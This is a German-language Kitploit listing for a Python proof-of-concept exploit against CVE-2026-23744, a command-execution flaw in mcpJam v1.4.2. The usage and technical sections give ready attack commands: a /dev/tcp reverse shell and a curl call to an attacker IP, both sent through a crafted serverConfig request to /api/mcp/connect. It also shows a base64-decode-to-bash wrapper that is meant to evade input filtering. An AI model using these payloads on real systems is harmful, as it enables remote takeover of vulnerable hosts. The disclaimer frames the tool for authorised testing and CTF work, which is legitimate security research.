Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-poc — cve-2026-23744 python Exploit | Kitploit
Tools/GitHubGitHub/keeieb79/cve-2026-23744-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubkeeieb79/cve-2026-23744-poc

CVE-2026-23744-poc

cve-2026-23744 python Exploit

Repository anzeigen
2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23744 — mcpJam-Exploit für Remote Code Execution (RCE)

Ein Proof-of-Concept-Exploit in Python 3 für CVE-2026-23744, eine Schwachstelle zur Ausführung beliebiger Befehle, die mcpJam v1.4.2 betrifft.

Diese Anwendung automatisiert die Zustellung von Payloads, indem sie Befehle vor der Übertragung transparent Base64-codiert und so dabei hilft, restriktive Eingabevalidierungen und Zeichenfiltermechanismen zu umgehen. Die Payload wird auf dem Zielsystem über einen /bin/bash-Wrapper dekodiert und ausgeführt.


Funktionen

Automatische Base64-Payload-Codierung

Befehle werden vor der Übertragung automatisch codiert, was die Zuverlässigkeit erhöht, wenn Anwendungen angegriffen werden, die strenge Eingabevalidierungen oder Zeichenbeschränkungen durchsetzen.

Flexible Befehlsausführung

Unterstützt die Ausführung beliebiger Befehle, einschließlich:

  • Reverse Shells (sh, bash, nc, usw.)
Tool herunterladen
  • System-Enumeration
  • Netzwerkkonnektivitätstests
  • Bereitstellung benutzerdefinierter Payloads
  • Ausführliche Debug-Ausgabe

    Zeigt:

    • Generierte JSON-Anfrage-Payloads
    • Rohe Serverantworten

    Dies vereinfacht die Fehlersuche und die Validierung des Exploits.

    SSL-Verifizierung umgehen

    Unterdrückt Warnungen zur Zertifikatsprüfung und ermöglicht so die Interaktion mit Zielen, die selbstsignierte oder anderweitig nicht vertrauenswürdige SSL-Zertifikate verwenden.


    Verwendung

    Voraussetzungen

    Installieren Sie die erforderliche Abhängigkeit:

    root@kitploit:~
    pip install requests
    

    Syntax

    root@kitploit:~
    python3 exploit.py <target_url> "<command>"
    

    Beispiele

    Konnektivitätstest

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
    

    Reverse Shell

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
    

    Technische Details

    Der Exploit zielt auf den Endpunkt /api/mcp/connect, indem ein bösartiges serverConfig-Objekt erstellt wird.

    Anstatt Befehle direkt zu übertragen, wird die Payload in eine Base64-codierte Zeichenfolge umgewandelt und über Bash ausgeführt:

    root@kitploit:~
    "args": [
        "-c",
        f"echo {base64_payload} | base64 -d | bash"
    ]
    

    Dieser Ansatz hilft, Filterung auf Anwendungsebene zu umgehen und stellt sicher, dass die Payload vollständig auf dem Zielsystem dekodiert und ausgeführt wird.

    Ausführungsablauf

    1. Der vom Benutzer bereitgestellte Befehl wird Base64-codiert.
    2. Die codierte Payload wird in die serverConfig-Anfrage eingebettet.
    3. Der Zielserver dekodiert die Payload mit base64 -d.
    4. Der dekodierte Befehl wird direkt an /bin/bash weitergeleitet.
    5. Der Befehl wird mit den Berechtigungen des verwundbaren mcpJam-Prozesses ausgeführt.

    Haftungsausschluss

    [!WARNING] Dieses Projekt dient ausschließlich zu Bildungszwecken, für autorisierte Sicherheitsbewertungen und Capture-The-Flag-Umgebungen (CTF).

    Die unbefugte Verwendung gegen Systeme, für die Sie keine ausdrückliche Genehmigung haben, ist illegal und unethisch. Der Autor übernimmt keine Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen, die aus der Verwendung dieser Software entstehen.